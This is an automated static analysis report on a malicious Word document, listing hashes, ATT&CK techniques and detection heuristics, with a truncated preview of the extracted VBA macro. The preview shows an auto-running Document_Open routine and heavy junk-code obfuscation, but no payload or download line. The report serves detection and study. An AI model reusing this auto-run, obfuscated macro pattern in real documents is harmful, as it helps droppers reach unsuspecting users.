Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 cd25d6b360603971…

MALICIOUS

Office (OLE)

Size: 184.5 KB
Created: 2017-07-12 00:55:00
Authoring application: Microsoft Office Word
First seen: 2020-08-10
MD5: 579b802b01e702500fdac1b331b9cb15
SHA-1: fdcc44f37005c5f3162f788adb7b4a2009160c72
SHA-256: cd25d6b360603971988ed44d51fa5078bf0d0cd25033a20a1b4c801c8087bdbf
Risk Score: 182

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1059 Command and Scripting Interpreter

The sample is a malicious Office document containing VBA macros, specifically a Document_Open macro that triggers obfuscated code. Critical heuristics indicate the use of Shell() calls, strongly suggesting the execution of arbitrary commands or the download of additional payloads. The obfuscated nature of the VBA script prevents a detailed analysis of its exact actions, but its presence and the Shell() call are indicative of a downloader or dropper.

Heuristics (5)

  • ClamAV: Doc.Macro.Obfuscation-6332451-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Obfuscation-6332451-0
  • VBA macros detected [medium] OLE_VBA_MACROS (2 related findings)
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ - In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# - In document text (OLE body)
    • http://purl.org/dc/elements/1.1/ - In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ - In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# - In document text (OLE body)
    • http://ns.adobe.com/tiff/1.0/ - In document text (OLE body)
    • http://ns.adobe.com/exif/1.0/ - In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/ - In document text (OLE body)
    • http://www.iec.ch - In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main - In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 112416 bytes
SHA-256: 6b9a9bc570a615424153b0a968bca8c4e103ea7939ef2bc8875dcdd979a95a52
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub Document_Open()
Dim KUI6FSl
KUI6FSl = Abs(40)
Dim STEsUCt, qzRF4vgf
STEsUCt = 1.3
qzRF4vgf = 1 / Cos(STEsUCt)
Dim ly2EX9, Qp2uQ
ly2EX9 = Array("hBt1w9Ul", "AIN8pQs")
Qp2uQ = ly2EX9(1)
Dim OEJxsoLwF, ms1ULmC
OEJxsoLwF = Array("f2RYgnO1", "xyLzTM8r", "nZyMn")
ms1ULmC = OEJxsoLwF(2)
Dim UNLdfm8, XlSG6CHI
UNLdfm8 = Array("Kxyv19d6i", "Cj2de")
XlSG6CHI = UNLdfm8(0)
Dim X2Qr6fa, XlPy5uV
X2Qr6fa = Array("vxw0DAs", "D9g1d", "IYDQSO8J")
XlPy5uV = X2Qr6fa(2)
Dim aNuWS, on7vNa
aNuWS = Array("EJRaW8x0u", "q4une")
on7vNa = aNuWS(0)
Dim y7c54ir, f0U8LEF5
y7c54ir = Array("hybDOCst")
f0U8LEF5 = y7c54ir(0)
Dim Rs74bCA
Rs74bCA = 4 * Atn(1)
tyg4SEu = 600 + 28
If tyg4SEu > -1368 + 1384 Then
r
End If
End Sub
Sub Document_Close()
Dim grzHo, ZgGWqL7UK
grzHo = Array("sU1pqbT", "dIeRnol", "ceYmr7LgW")
ZgGWqL7UK = grzHo(0)
Dim CBCczOYZ, O7NaTX5
CBCczOYZ = Array("MDKUkHy")
O7NaTX5 = CBCczOYZ(0)
Dim CJz2LuR, rAENWhMgG
CJz2LuR = Array("L4wLO")
rAENWhMgG = CJz2LuR(0)
Dim E8tV1, RDnHUYFK0
E8tV1 = Array("marI1x7s", "FfdR9v")
RDnHUYFK0 = E8tV1(0)
Dim g9H5plDn
g9H5plDn = Abs(92)
Dim UQTXVSp
UQTXVSp = 4 * Atn(1)
Dim YAgCx
YAgCx = 4 * Atn(1)
End Sub

Attribute VB_Name = "hvPuz2b"
Sub r()
Dim GTwa76P, Wnm92
GTwa76P = 1.3
Wnm92 = 1 / Cos(GTwa76P)
Dim yS6F0
yS6F0 = Abs(52)
Dim qepsU, G7gUb
qepsU = Array("R1vyC6O", "Gd2TZMybS")
G7gUb = qepsU(0)
Dim f2FiNZxl, ezO52r
f2FiNZxl = 1.3
ezO52r = 1 / Cos(f2FiNZxl)
Dim v0rLDFZG4, ywxkK
v0rLDFZG4 = 1.3
ywxkK = 1 / Cos(v0rLDFZG4)
Dim YGM7l0, U5UTiCSp
YGM7l0 = 1.3
U5UTiCSp = 1 / Cos(YGM7l0)
Dim ALfAP, qJr6HI4cD
ALfAP = Array("cWY5s", "Xo6CbB", "V2rZ1")
qJr6HI4cD = ALfAP(0)
Dim MShHW6, t8t4R
MShHW6 = Array("hQkMebfI0", "uoFIsw")
t8t4R = MShHW6(1)
Dim AMOuZ52
AMOuZ52 = Abs(56)
Dim tQEwIb, OmrE2
tQEwIb = 1.3
OmrE2 = 1 / Cos(tQEwIb)
Dim d8guMlU, Nq4bSBR
d8guMlU = Array("XJfR5X")
Nq4bSBR = d8guMlU(0)
Dim pslKrhi1k, NXHVD9B
pslKrhi1k = Array("SHhLX2Az", "ZVYG6p")
NXHVD9B = pslKrhi1k(1)
Dim uqQEP
uqQEP = Abs(73)
Dim gMtDFoie
gMtDFoie = 4 * Atn(1)
Dim hiYAxog, Sf6HP
hiYAxog = Array("X0emxXD", "ALlwQ9", "dh1kIz3W")
Sf6HP = hiYAxog(0)
Dim yj3GDv6M, tn0eNUt
yj3GDv6M = Array("rxt0Di6")
tn0eNUt = yj3GDv6M(0)
Dim DcQyOgk
DcQyOgk = Abs(55)
Dim CxuC2tDe, tqtgRwI8z
CxuC2tDe = 1.3
tqtgRwI8z = 1 / Cos(CxuC2tDe)
Dim MjQ4ek5O
MjQ4ek5O = 4 * Atn(1)
Dim jxpJ6CG, J3dKhP6
jxpJ6CG = Array("nxQZcXOoL")
J3dKhP6 = jxpJ6CG(0)
Dim x2jzLY, jJtHxfNgB
x2jzLY = Array("jf2Rs0gJl", "oCGjV2")
jJtHxfNgB = x2jzLY(0)
Dim NSFp8, fCEfVdy
NSFp8 = Array("stoxHjpk7")
fCEfVdy = NSFp8(0)
Dim b0YscGkUt
b0YscGkUt = 4 * Atn(1)
Dim oITcCQbV7, jeTn1
oITcCQbV7 = Array("E6eYL5kl", "GJOLxMc", "STfpZLbr")
jeTn1 = oITcCQbV7(0)
Dim GLsBbKloI
GLsBbKloI = 4 * Atn(1)
Dim jkfDwy, o8dVE0
jkfDwy = Array("xjYgVP", "knOHk7RX", "TOVDhcUX")
o8dVE0 = jkfDwy(0)
Dim R7bUzK
R7bUzK = 4 * Atn(1)
Dim R4qR2NxZ, ThDKAa
R4qR2NxZ = Array("d9Js1G", "dCQPzW", "FdO3ys8ie")
ThDKAa = R4qR2NxZ(0)
Dim fvblZeiX, lTFjxbv
fvblZeiX = Array("fvweBdAmT", "eDcG3r")
lTFjxbv = fvblZeiX(1)
Dim aOUgI, AzZgw0fT4
aOUgI = Array("XoqO43m", "o893BTu", "ZxJaLtO")
AzZgw0fT4 = aOUgI(0)
Dim oYIev, alXqmQ9
oYIev = Array("XBw7qmtA3")
alXqmQ9 = oYIev(0)
Dim qST6xw4
qST6xw4 = 4 * Atn(1)
Dim ogD8GQ7, wLCsEj1a
ogD8GQ7 = Array("scbzV9XhA")
wLCsEj1a = ogD8GQ7(0)
Dim SvRwkBJS9, pgBvoM
SvRwkBJS9 = 1.3
pgBvoM = 1 / Cos(SvRwkBJS9)
Dim F8aNA45E
F8aNA45E = Abs(52)
Dim z3Sk0dxpL, AslcIZ
z3Sk0dxpL = Array("rBI4GtHJ0")
AslcIZ = z3Sk0dxpL(0)
Dim WkdYwD2, toBVsCe
WkdYwD2 = 1.3
toBVsCe = 1 / Cos(WkdYwD2)
Dim jmkQfDI9, St801C3ke
jmkQfDI9 = Array("wtD5PLf", "oem7jz9")
St801C3ke = jmkQfDI9(1)
Dim SzisCWvI, g1nWc
SzisCWvI = Array("do1LCOJN", "PUsxPBX7", "hry4J")
g1nWc = SzisCWvI(2)
Dim aNqwp2UGH, vySrYp
aNqw
... (truncated)